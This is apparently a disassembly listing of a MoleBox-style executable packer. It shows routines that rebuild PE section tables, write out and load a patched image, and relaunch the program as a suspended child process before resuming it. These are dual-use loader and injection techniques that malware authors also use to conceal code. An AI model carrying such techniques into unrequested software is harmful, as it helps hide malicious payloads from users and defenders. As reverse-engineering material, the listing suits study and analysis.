push 0
push 0
push 0F8h
push [ebp+var_4C]
push [ebp+var_3C]
call sub_501177
test eax, eax
jz short loc_506511
cmp [ebp+var_64], 0
jnz short loc_50651B
loc_506511: ; CODE XREF: sub_5061E1+328�j
mov ecx, 0EF00000Fh
call sub_508342
loc_50651B: ; CODE XREF: sub_5061E1+32E�j
mov eax, [ebp+var_4C]
cmp dword ptr [eax], 4550h
jz short loc_506530
mov ecx, 0EF00000Ch
call sub_508342
loc_506530: ; CODE XREF: sub_5061E1+343�j
mov eax, [ebp+var_4C]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_4C]
lea eax, [ecx+eax+18h]
sub eax, [ebp+var_4C]
mov ecx, [ebp+var_50]
mov ecx, [ecx+3Ch]
add ecx, eax
mov [ebp+var_70], ecx
mov eax, [ebp+var_4C]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_70]
add ecx, eax
mov [ebp+var_68], ecx
mov [ebp+var_34], 600h
push [ebp+var_34]
call sub_50835A
pop ecx
mov [ebp+var_FC], eax
mov eax, [ebp+var_FC]
mov [ebp+var_1C], eax
mov ecx, [ebp+var_34]
xor eax, eax
mov edi, [ebp+var_1C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 200h
call sub_50835A
pop ecx
mov [ebp+var_100], eax
mov eax, [ebp+var_100]
mov [ebp+var_54], eax
mov ecx, 80h
mov eax, 90909090h
mov edi, [ebp+var_54]
rep stosd
push 0
push 0
push 0
push [ebp+var_3C]
call sub_500421
lea eax, [ebp+var_64]
push eax
push 0
push 0
push [ebp+var_68]
push [ebp+var_1C]
push [ebp+var_3C]
call sub_501177
test eax, eax
jz short loc_5065EA
cmp [ebp+var_64], 0
jnz short loc_5065F4
loc_5065EA: ; CODE XREF: sub_5061E1+401�j
mov ecx, 0EF00000Fh
call sub_508342
loc_5065F4: ; CODE XREF: sub_5061E1+407�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
add ecx, [eax+3Ch]
mov [ebp+var_A0], ecx
mov eax, [ebp+var_A0]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_A0]
lea eax, [ecx+eax+18h]
mov [ebp+var_90], eax
mov eax, [ebp+var_A0]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_90]
add ecx, eax
mov [ebp+var_8C], ecx
mov eax, [ebp+var_A0]
add eax, 88h
mov [ebp+var_98], eax
mov eax, [ebp+var_A0]
add eax, 80h
mov [ebp+var_88], eax
mov eax, [ebp+var_A0]
and dword ptr [eax+24h], 0
mov eax, [ebp+var_A0]
and dword ptr [eax+20h], 0
mov eax, [ebp+var_A0]
and dword ptr [eax+1Ch], 0
mov eax, [ebp+var_54]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+0A0h]
mov [eax+34h], ecx
mov eax, [ebp+var_54]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+0A4h]
mov [eax+38h], ecx
mov eax, [ebp+var_A0]
cmp dword ptr [eax+84h], 0
jz short loc_5066BF
mov eax, [ebp+var_54]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+80h]
mov [eax+3Ch], ecx
jmp short loc_5066C6
; ---------------------------------------------------------------------------
loc_5066BF: ; CODE XREF: sub_5061E1+4C8�j
mov eax, [ebp+var_54]
and dword ptr [eax+3Ch], 0
loc_5066C6: ; CODE XREF: sub_5061E1+4DC�j
mov eax, [ebp+var_54]
add eax, 40h
mov [ebp+var_94], eax
mov eax, [ebp+var_94]
and dword ptr [eax], 0
mov eax, [ebp+var_54]
add eax, 44h
mov [ebp+var_9C], eax
jmp short loc_5066F8
; ---------------------------------------------------------------------------
loc_5066E9: ; CODE XREF: sub_5061E1:loc_506C30�j
mov eax, [ebp+var_90]
add eax, 28h
mov [ebp+var_90], eax
loc_5066F8: ; CODE XREF: sub_5061E1+506�j
mov eax, [ebp+var_90]
cmp eax, [ebp+var_8C]
jnb loc_506C35
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_90]
mov ecx, [ecx+14h]
mov [eax], ecx
mov eax, [ebp+var_9C]
add eax, 4
mov [ebp+var_9C], eax
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_90]
mov ecx, [ecx+10h]
mov [eax], ecx
mov eax, [ebp+var_9C]
add eax, 4
mov [ebp+var_9C], eax
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_90]
mov ecx, [ecx+24h]
mov [eax], ecx
mov eax, [ebp+var_9C]
add eax, 4
mov [ebp+var_9C], eax
cmp ds:dword_511680, 2
jnb loc_50686E
mov eax, [ebp+var_90]
mov ecx, [ebp+var_98]
mov eax, [eax+0Ch]
cmp eax, [ecx]
ja loc_50686E
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_90]
add eax, [ecx+10h]
mov ecx, [ebp+var_98]
cmp eax, [ecx]
jbe loc_50686E
push 200h
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
call sub_505AE5
pop ecx
pop ecx
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_50835A
pop ecx
mov [ebp+var_104], eax
mov eax, [ebp+var_104]
mov [ebp+var_2C], eax
mov eax, [ebp+var_A0]
push dword ptr [eax+38h]
mov eax, [ebp+var_90]
push dword ptr [eax+8]
call sub_505AE5
pop ecx
pop ecx
mov ecx, [ebp+var_A0]
mov ecx, [ecx+20h]
add ecx, eax
mov eax, [ebp+var_A0]
mov [eax+20h], ecx
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+14h]
push [ebp+var_3C]
call sub_500421
lea eax, [ebp+var_64]
push eax
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
push [ebp+var_2C]
push [ebp+var_3C]
call sub_501177
test eax, eax
jz short loc_506846
cmp [ebp+var_64], 0
jnz short loc_506850
loc_506846: ; CODE XREF: sub_5061E1+65D�j
mov ecx, 0EF00000Fh
call sub_508342
loc_506850: ; CODE XREF: sub_5061E1+663�j
mov eax, [ebp+var_90]
mov ecx, [ebp+var_34]
mov [eax+14h], ecx
mov eax, [ebp+var_90]
mov dword ptr [eax+24h], 0C0000040h
jmp loc_506C30
; ---------------------------------------------------------------------------
loc_50686E: ; CODE XREF: sub_5061E1+590�j
; sub_5061E1+5A7�j ...
mov eax, [ebp+var_90]
mov ecx, [ebp+var_88]
mov eax, [eax+0Ch]
cmp eax, [ecx]
ja loc_506B8F
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_90]
add eax, [ecx+10h]
mov ecx, [ebp+var_88]
cmp eax, [ecx]
jbe loc_506B8F
and [ebp+var_A8], 0
mov [ebp+var_4], 1
push 4
push 1000h
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
push 0
call ds:dword_5117A4 ; VirtualAlloc
mov [ebp+var_A8], eax
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+14h]
push [ebp+var_3C]
call sub_500421
lea eax, [ebp+var_64]
push eax
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
push [ebp+var_A8]
push [ebp+var_3C]
call sub_501177
test eax, eax
jz short loc_50690F
cmp [ebp+var_64], 0
jnz short loc_506919
loc_50690F: ; CODE XREF: sub_5061E1+726�j
mov ecx, 0EF00000Fh
call sub_508342
loc_506919: ; CODE XREF: sub_5061E1+72C�j
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
mov [ebp+var_B0], eax
mov eax, [ebp+var_88]
mov eax, [eax]
sub eax, [ebp+var_B0]
mov ecx, [ebp+var_A8]
add ecx, eax
mov [ebp+var_AC], ecx
and [ebp+var_B4], 0
jmp short loc_50695A
; ---------------------------------------------------------------------------
loc_50694D: ; CODE XREF: sub_5061E1:loc_506B5A�j
mov eax, [ebp+var_B4]
inc eax
mov [ebp+var_B4], eax
loc_50695A: ; CODE XREF: sub_5061E1+76A�j
mov eax, [ebp+var_88]
mov eax, [eax+4]
xor edx, edx
push 14h
pop ecx
div ecx
cmp [ebp+var_B4], eax
jnb loc_506B5F
mov eax, [ebp+var_B4]
imul eax, 14h
mov ecx, [ebp+var_AC]
cmp dword ptr [ecx+eax+0Ch], 0
jnz short loc_506991
jmp loc_506B5F
; ---------------------------------------------------------------------------
loc_506991: ; CODE XREF: sub_5061E1+7A9�j
mov eax, [ebp+var_B4]
imul eax, 14h
mov ecx, [ebp+var_AC]
mov edx, [ebp+var_A8]
add edx, [ecx+eax+0Ch]
sub edx, [ebp+var_B0]
mov [ebp+var_BC], edx
mov eax, [ebp+var_90]
mov ecx, [ebp+var_A8]
add ecx, [eax+10h]
cmp [ebp+var_BC], ecx
jbe short loc_5069D2
jmp loc_506B5F
; ---------------------------------------------------------------------------
loc_5069D2: ; CODE XREF: sub_5061E1+7EA�j
mov eax, [ebp+var_BC]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_5069E4
jmp loc_506B5F
; ---------------------------------------------------------------------------
loc_5069E4: ; CODE XREF: sub_5061E1+7FC�j
and ds:dword_511968, 0
and [ebp+var_B8], 0
push [ebp+var_BC]
call sub_50AE83
mov [ebp+var_B8], eax
cmp [ebp+var_B8], 0
jnz loc_506B27
cmp ds:dword_511968, 0
jz short loc_506A1E
jmp loc_506B29
; ---------------------------------------------------------------------------
loc_506A1E: ; CODE XREF: sub_5061E1+836�j
mov edi, [ebp+var_BC]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
push ecx
push [ebp+var_24]
call sub_5092CA
pop ecx
pop ecx
mov [ebp+var_C0], eax
mov [ebp+var_4], 2
push 5Ch
push [ebp+var_C0]
call sub_4FC700
pop ecx
pop ecx
mov [ebp+var_C4], eax
cmp [ebp+var_C4], 0
jz short loc_506A72
mov eax, [ebp+var_C4]
inc eax
mov [ebp+var_C4], eax
jmp short loc_506A7E
; ---------------------------------------------------------------------------
loc_506A72: ; CODE XREF: sub_5061E1+880�j
mov eax, [ebp+var_C0]
mov [ebp+var_C4], eax
loc_506A7E: ; CODE XREF: sub_5061E1+88F�j
mov edi, [ebp+var_BC]
mov edx, [ebp+var_C4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push [ebp+var_C0]
call sub_50AE83
mov [ebp+var_B8], eax
cmp [ebp+var_B8], 0
jnz short loc_506B00
cmp ds:dword_511968, 0
jz short loc_506AD9
push 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
jmp short loc_506B29
; ---------------------------------------------------------------------------
loc_506AD9: ; CODE XREF: sub_5061E1+8E7�j
push 7Eh
call ds:dword_51178C ; RtlRestoreLastWin32Error
push 0FFFFFFFFh
and [ebp+var_140], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_140]
jmp loc_507132
; ---------------------------------------------------------------------------
loc_506B00: ; CODE XREF: sub_5061E1+8DE�j
mov [ebp+var_4], 1
call sub_506B0E
jmp short loc_506B27
sub_5061E1 endp
; =============== S U B R O U T I N E =======================================
sub_506B0E proc near ; CODE XREF: sub_5061E1+926�p
; DATA XREF: _6:0050E4E0�o
mov eax, [ebp-0C0h]
mov [ebp-108h], eax
push dword ptr [ebp-108h]
call sub_5083DD
pop ecx
retn
sub_506B0E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_5061E1
loc_506B27: ; CODE XREF: sub_5061E1+829�j
; sub_5061E1+92B�j
jmp short loc_506B2D
; ---------------------------------------------------------------------------
loc_506B29: ; CODE XREF: sub_5061E1+838�j
; sub_5061E1+8F6�j
mov [ebp+var_5C], 1
loc_506B2D: ; CODE XREF: sub_5061E1:loc_506B27�j
cmp [ebp+var_B8], 0
jz short loc_506B5A
mov eax, [ebp+var_94]
push dword ptr [eax]
push [ebp+var_B8]
push [ebp+var_BC]
call sub_5056EB
add esp, 0Ch
mov ecx, [ebp+var_94]
mov [ecx], eax
loc_506B5A: ; CODE XREF: sub_5061E1+953�j
jmp loc_50694D
; ---------------------------------------------------------------------------
loc_506B5F: ; CODE XREF: sub_5061E1+78F�j
; sub_5061E1+7AB�j ...
push 8000h
push 0
push [ebp+var_A8]
call ds:dword_5117A8 ; VirtualFree
and [ebp+var_A8], 0
and [ebp+var_4], 0
jmp short loc_506B8F
; END OF FUNCTION CHUNK FOR sub_5061E1
; =============== S U B R O U T I N E =======================================
sub_506B7F proc near ; DATA XREF: _6:0050E4D0�o
push dword ptr [ebp-14h]
call sub_508C27
retn
sub_506B7F endp
; =============== S U B R O U T I N E =======================================
sub_506B88 proc near ; DATA XREF: _6:0050E4D4�o
mov esp, [ebp-18h]
and dword ptr [ebp-4], 0
sub_506B88 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_5061E1
loc_506B8F: ; CODE XREF: sub_5061E1+69E�j
; sub_5061E1+6BE�j ...
mov eax, [ebp+var_90]
mov ecx, [ebp+var_90]
mov eax, [eax+8]
cmp eax, [ecx+10h]
jbe short loc_506BB4
mov eax, [ebp+var_90]
mov eax, [eax+8]
mov [ebp+var_144], eax
jmp short loc_506BC3
; ---------------------------------------------------------------------------
loc_506BB4: ; CODE XREF: sub_5061E1+9C0�j
mov eax, [ebp+var_90]
mov eax, [eax+10h]
mov [ebp+var_144], eax
loc_506BC3: ; CODE XREF: sub_5061E1+9D1�j
mov eax, [ebp+var_A0]
push dword ptr [eax+38h]
push [ebp+var_144]
call sub_505AE5
pop ecx
pop ecx
mov ecx, [ebp+var_90]
mov [ecx+8], eax
mov eax, [ebp+var_A0]
push dword ptr [eax+38h]
mov eax, [ebp+var_90]
push dword ptr [eax+8]
call sub_505AE5
pop ecx
pop ecx
mov ecx, [ebp+var_A0]
mov ecx, [ecx+24h]
add ecx, eax
mov eax, [ebp+var_A0]
mov [eax+24h], ecx
mov eax, [ebp+var_90]
and dword ptr [eax+10h], 0
mov eax, [ebp+var_90]
and dword ptr [eax+14h], 0
mov eax, [ebp+var_90]
mov dword ptr [eax+24h], 0E0000080h
loc_506C30: ; CODE XREF: sub_5061E1+688�j
jmp loc_5066E9
; ---------------------------------------------------------------------------
loc_506C35: ; CODE XREF: sub_5061E1+523�j
and [ebp+var_A4], 0
jmp short loc_506C4B
; ---------------------------------------------------------------------------
loc_506C3E: ; CODE XREF: sub_5061E1+A7C�j
; sub_5061E1+A87�j ...
mov eax, [ebp+var_A4]
inc eax
mov [ebp+var_A4], eax
loc_506C4B: ; CODE XREF: sub_5061E1+A5B�j
cmp [ebp+var_A4], 10h
jnb short loc_506C8E
cmp [ebp+var_A4], 0
jnz short loc_506C5F
jmp short loc_506C3E
; ---------------------------------------------------------------------------
loc_506C5F: ; CODE XREF: sub_5061E1+A7A�j
cmp [ebp+var_A4], 2
jnz short loc_506C6A
jmp short loc_506C3E
; ---------------------------------------------------------------------------
loc_506C6A: ; CODE XREF: sub_5061E1+A85�j
mov eax, [ebp+var_A4]
mov ecx, [ebp+var_A0]
and dword ptr [ecx+eax*8+7Ch], 0
mov eax, [ebp+var_A4]
mov ecx, [ebp+var_A0]
and dword ptr [ecx+eax*8+78h], 0
jmp short loc_506C3E
; ---------------------------------------------------------------------------
loc_506C8E: ; CODE XREF: sub_5061E1+A71�j
push 0Ah
pop ecx
xor eax, eax
mov edi, [ebp+var_90]
rep stosd
mov eax, [ebp+var_34]
add eax, [ebp+var_30]
mov ecx, [ebp+var_90]
mov [ecx+14h], eax
mov eax, [ebp+var_90]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+50h]
mov [eax+0Ch], ecx
mov esi, offset a_box_ ; "_BOX_"
mov edi, [ebp+var_90]
movsd
movsw
mov eax, [ebp+var_90]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+38h]
mov [eax+8], ecx
mov eax, [ebp+var_90]
mov dword ptr [eax+10h], 200h
mov eax, [ebp+var_90]
mov dword ptr [eax+24h], 0E0000020h
mov eax, [ebp+var_A0]
mov dword ptr [eax+3Ch], 200h
mov eax, [ebp+var_A0]
mov eax, [eax+50h]
mov ecx, [ebp+var_A0]
add eax, [ecx+38h]
mov ecx, [ebp+var_A0]
mov [ecx+50h], eax
mov eax, [ebp+var_A0]
mov eax, [eax+1Ch]
mov ecx, [ebp+var_A0]
add eax, [ecx+3Ch]
mov ecx, [ebp+var_A0]
mov [ecx+1Ch], eax
mov eax, [ebp+var_A0]
mov eax, [eax+28h]
mov [ebp+var_20], eax
push 5
pop ecx
mov esi, offset loc_510C70
mov edi, [ebp+var_54]
rep movsd
movsw
movsb
mov eax, [ebp+var_54]
inc eax
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+28h]
mov [eax+1], ecx
call sub_5058A0
mov ecx, [ebp+var_C8]
mov ecx, [ecx+1]
xor ecx, eax
mov eax, [ebp+var_C8]
mov [eax+1], ecx
mov eax, [ebp+var_C8]
add eax, 5
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov ecx, [ebp+var_24]
mov [eax+1], ecx
mov eax, [ebp+var_C8]
add eax, 5
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov ecx, [ebp+var_3C]
mov [eax+1], ecx
mov eax, [ebp+var_C8]
add eax, 5
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
inc eax
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov dword ptr [eax+1], offset sub_505BD7
and [ebp+var_C8], 0
xor eax, eax
mov edi, [ebp+var_54]
add edi, 20h
stosd
stosd
stosd
mov eax, [ebp+var_54]
mov dword ptr [eax+24h], 8
mov eax, [ebp+var_A0]
mov dword ptr [eax+0A4h], 8
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
add eax, 20h
mov ecx, [ebp+var_A0]
mov [ecx+0A0h], eax
mov eax, [ebp+var_A0]
mov ecx, [ebp+var_90]
mov ecx, [ecx+0Ch]
mov [eax+28h], ecx
mov eax, [ebp+var_A0]
mov ax, [eax+6]
add ax, 1
mov ecx, [ebp+var_A0]
mov [ecx+6], ax
mov eax, [ebp+var_A0]
and dword ptr [eax+58h], 0
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+var_28]
call ds:dword_5116A8 ; CreateFileA
mov [ebp+var_58], eax
cmp [ebp+var_58], 0FFFFFFFFh
jnz short loc_506E8C
mov ecx, 0EF000011h
call sub_508342
loc_506E8C: ; CODE XREF: sub_5061E1+C9F�j
push 0
lea eax, [ebp+var_CC]
push eax
push [ebp+var_34]
push [ebp+var_1C]
push [ebp+var_58]
call ds:dword_5117BC ; WriteFile
cmp [ebp+var_2C], 0
jz short loc_506EC2
push 0
lea eax, [ebp+var_CC]
push eax
push [ebp+var_30]
push [ebp+var_2C]
push [ebp+var_58]
call ds:dword_5117BC ; WriteFile
loc_506EC2: ; CODE XREF: sub_5061E1+CC7�j
push 0
lea eax, [ebp+var_CC]
push eax
push 200h
push [ebp+var_54]
push [ebp+var_58]
call ds:dword_5117BC ; WriteFile
push [ebp+var_58]
call ds:dword_5116D8 ; FlushFileBuffers
push [ebp+var_58]
call ds:dword_5116A4 ; CloseHandle
mov ds:dword_511958, 1
push [ebp+var_28]
call ds:dword_51175C ; LoadLibraryA
mov [ebp+var_D0], eax
cmp [ebp+var_D0], 0
jnz short loc_506F2B
push 351h
push offset aDProjectsMy_sr ; "D:\\Projects\\My.SRC\\MoleStudio\\MoleBox\\m"...
call sub_5087CA
pop ecx
pop ecx
mov ecx, 0EF000010h
call sub_508342
loc_506F2B: ; CODE XREF: sub_5061E1+D2D�j
movzx eax, [ebp+var_5C]
test eax, eax
jz loc_50705C
mov eax, [ebp+var_D0]
mov [ebp+var_DC], eax
mov eax, [ebp+var_DC]
mov ecx, [ebp+var_DC]
add ecx, [eax+3Ch]
mov [ebp+var_EC], ecx
mov eax, [ebp+var_EC]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_EC]
lea eax, [ecx+eax+18h]
mov [ebp+var_E8], eax
mov eax, [ebp+var_EC]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_E8]
lea eax, [ecx+eax-28h]
mov [ebp+var_E0], eax
mov eax, [ebp+var_E0]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_DC]
mov eax, [ecx+eax+3Ch]
mov [ebp+var_E4], eax
mov eax, [ebp+var_DC]
add eax, [ebp+var_E4]
mov [ebp+var_D8], eax
push 5Ch
push [ebp+var_24]
call sub_4FC700
pop ecx
pop ecx
mov [ebp+var_D4], eax
cmp [ebp+var_D4], 0
jnz short loc_506FE0
mov eax, [ebp+var_24]
mov [ebp+var_D4], eax
jmp short loc_506FED
; ---------------------------------------------------------------------------
loc_506FE0: ; CODE XREF: sub_5061E1+DF2�j
mov eax, [ebp+var_D4]
inc eax
mov [ebp+var_D4], eax
loc_506FED: ; CODE XREF: sub_5061E1+DFD�j
push 14h
call sub_50835A
pop ecx
mov [ebp+var_10C], eax
mov eax, [ebp+var_10C]
mov [ebp+var_F0], eax
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_D4]
mov [eax], ecx
mov eax, [ebp+var_F0]
mov ecx, ds:dword_51196C
mov [eax+10h], ecx
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_EC]
mov [eax+0Ch], ecx
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_D8]
mov [eax+4], ecx
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_DC]
mov [eax+8], ecx
mov eax, [ebp+var_F0]
mov ds:dword_51196C, eax
loc_50705C: ; CODE XREF: sub_5061E1+D50�j
call sub_50614D
push 0FFFFFFFFh
mov eax, [ebp+var_D0]
mov [ebp+var_148], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_148]
jmp loc_507132
; END OF FUNCTION CHUNK FOR sub_5061E1
; =============== S U B R O U T I N E =======================================
sub_507085 proc near ; DATA XREF: _6:0050E4C8�o
cmp ds:dword_511964, 0
jz short loc_507096
mov eax, [ebp-44h]
mov ds:dword_511964, eax
loc_507096: ; CODE XREF: sub_507085+7�j
cmp dword ptr [ebp-3Ch], 0FFFFFFFFh
jz short loc_5070A6
push 0
push dword ptr [ebp-3Ch]
call sub_500741
loc_5070A6: ; CODE XREF: sub_507085+15�j
mov eax, [ebp-50h]
mov [ebp-110h], eax
push dword ptr [ebp-110h]
call sub_5083DD
pop ecx
mov eax, [ebp-4Ch]
mov [ebp-114h], eax
push dword ptr [ebp-114h]
call sub_5083DD
pop ecx
mov eax, [ebp-1Ch]
mov [ebp-118h], eax
push dword ptr [ebp-118h]
call sub_5083DD
pop ecx
mov eax, [ebp-2Ch]
mov [ebp-11Ch], eax
push dword ptr [ebp-11Ch]
call sub_5083DD
pop ecx
mov eax, [ebp-54h]
mov [ebp-120h], eax
push dword ptr [ebp-120h]
call sub_5083DD
pop ecx
mov eax, [ebp-28h]
mov [ebp-124h], eax
push dword ptr [ebp-124h]
call sub_5083DD
pop ecx
push offset dword_511930
call ds:dword_511754 ; RtlLeaveCriticalSection
retn
sub_507085 endp
; ---------------------------------------------------------------------------
xor eax, eax
; START OF FUNCTION CHUNK FOR sub_5061E1
loc_507132: ; CODE XREF: sub_5061E1+C3�j
; sub_5061E1+145�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_5061E1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_507141 proc near ; CODE XREF: sub_50AA24+15�p
; sub_50AA5E+43�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
push [ebp+arg_0]
mov ecx, ds:dword_51194C
call sub_50B871
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_5071BD
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_8]
jbe short loc_507199
mov ecx, [ebp+var_8]
inc ecx
mov esi, [ebp+var_4]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_5071B8
; ---------------------------------------------------------------------------
loc_507199: ; CODE XREF: sub_507141+34�j
mov ecx, [ebp+arg_8]
mov esi, [ebp+var_4]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_8]
mov [eax], ecx
loc_5071B8: ; CODE XREF: sub_507141+56�j
push 1
pop eax
jmp short loc_5071BF
; ---------------------------------------------------------------------------
loc_5071BD: ; CODE XREF: sub_507141+1C�j
xor eax, eax
loc_5071BF: ; CODE XREF: sub_507141+7A�j
pop edi
pop esi
leave
retn
sub_507141 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5071C3 proc near ; CODE XREF: sub_50A0C8+42�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E4E8
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 80h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_78], 0
and [ebp+var_74], 0
and [ebp+var_70], 0
xor eax, eax
lea edi, [ebp+var_6C]
stosd
and [ebp+var_60], 0
push 10h
pop ecx
xor eax, eax
lea edi, [ebp+var_5C]
rep stosd
call ds:dword_5116E4 ; GetCurrentProcess
mov [ebp+var_68], eax
mov [ebp+var_64], offset dword_4FD720
and [ebp+var_1C], 0
cmp ds:dword_511958, 0
jz loc_507324
and [ebp+var_4], 0
push 105h
call sub_50835A
pop ecx
mov [ebp+var_8C], eax
mov eax, [ebp+var_8C]
mov [ebp+var_78], eax
push 50h
call sub_50835A
pop ecx
mov [ebp+var_90], eax
mov eax, [ebp+var_90]
mov [ebp+var_74], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_78]
rep stosd
stosb
push 104h
push [ebp+var_78]
push 0
call ds:dword_511718 ; GetModuleHandleA
push eax
call ds:dword_511714 ; GetModuleFileNameA
mov [ebp+var_60], 44h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_60]
push eax
push 0
push 0
push 4
push 1
push 0
push 0
push 0
push [ebp+var_78]
call ds:dword_5116B8 ; CreateProcessA
test eax, eax
jnz short loc_5072BD
mov ecx, 0EF000015h
call sub_508342
loc_5072BD: ; CODE XREF: sub_5071C3+EE�j
call ds:dword_5116E8 ; GetCurrentProcessId
push eax
push [ebp+var_88]
call sub_507494
pop ecx
pop ecx
push [ebp+var_84]
call ds:dword_50E024 ; ResumeThread
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_507324
; ---------------------------------------------------------------------------
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_94], eax
cmp [ebp+var_94], 0EF000015h
jnz short loc_507308
mov [ebp+var_98], 1
jmp short loc_507316
; ---------------------------------------------------------------------------
loc_507308: ; CODE XREF: sub_5071C3+137�j
push [ebp+var_14]
call sub_508C27
mov [ebp+var_98], eax
loc_507316: ; CODE XREF: sub_5071C3+143�j
mov eax, [ebp+var_98]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_507324: ; CODE XREF: sub_5071C3+66�j
; sub_5071C3+11E�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_5071C3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_507333 proc near ; CODE XREF: sub_507482+B�p
; DATA XREF: sub_507482+6�o ...
var_24C = byte ptr -24Ch
var_220 = byte ptr -220h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
push ebp
mov ebp, esp
sub esp, 24Ch
push edi
and [ebp+var_108], 0
push ds:dword_511920
push 0
push 1F0FFFh
call ds:dword_511994
mov ds:dword_511948, eax
cmp ds:dword_511948, 0
jz short loc_5073A4
loc_507365: ; CODE XREF: sub_507333+63�j
lea eax, [ebp+var_108]
push eax
push ds:dword_511948
call ds:dword_511988
test eax, eax
jz short loc_507398
cmp [ebp+var_108], 103h
jnz short loc_507398
push 0FFFFFFFFh
push ds:dword_511948
call ds:dword_51198C
jmp short loc_507365
; ---------------------------------------------------------------------------
loc_507398: ; CODE XREF: sub_507333+47�j
; sub_507333+53�j
push ds:dword_511948
call ds:dword_51199C
loc_5073A4: ; CODE XREF: sub_507333+30�j
or [ebp+var_10C], 0FFFFFFFFh
and [ebp+var_104], 0
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
